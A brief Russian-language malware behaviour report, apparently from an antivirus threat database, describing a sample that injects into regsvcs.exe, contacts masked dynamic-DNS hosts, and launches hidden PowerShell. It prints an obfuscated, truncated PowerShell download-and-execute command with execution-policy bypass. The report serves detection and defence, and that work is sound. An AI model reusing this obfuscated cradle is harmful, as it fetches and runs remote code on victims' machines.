Техническая информация
Вредоносные функции
Внедряет код в
следующие системные процессы:
- %WINDIR%\microsoft.net\framework\v4.0.30319\regsvcs.exe
Сетевая активность
TCP
- 'f.###4top.io':443
- 'la####e3.hopto.org':333
UDP
- DNS ASK f.###4top.io
- DNS ASK la####e3.hopto.org
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -windowstyle hidden -noexit -executionpolicy bypass -command I`EX ((neW`-Obj`EcT (('N'+'et'+'.'+'We'+'bc'+'li'+'ent'))).(('D'+'o'+'w'+'n'+'l'+'o'+'a'+'d'+'s'+'t'+'ri'+'n'+'g')).InVokE((('ht'+'t...' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -windowstyle hidden -noexit -executionpolicy bypass -command I`EX ((neW`-Obj`EcT (('N'+'et'+'.'+'We'+'bc'+'li'+'ent'))).(('D'+'o'+'w'+'n'+'l'+'o'+'a'+'d'+'s'+'t'+'ri'+'n'+'g')).InVokE((('ht'+'t...
- '%WINDIR%\microsoft.net\framework\v4.0.30319\regsvcs.exe'
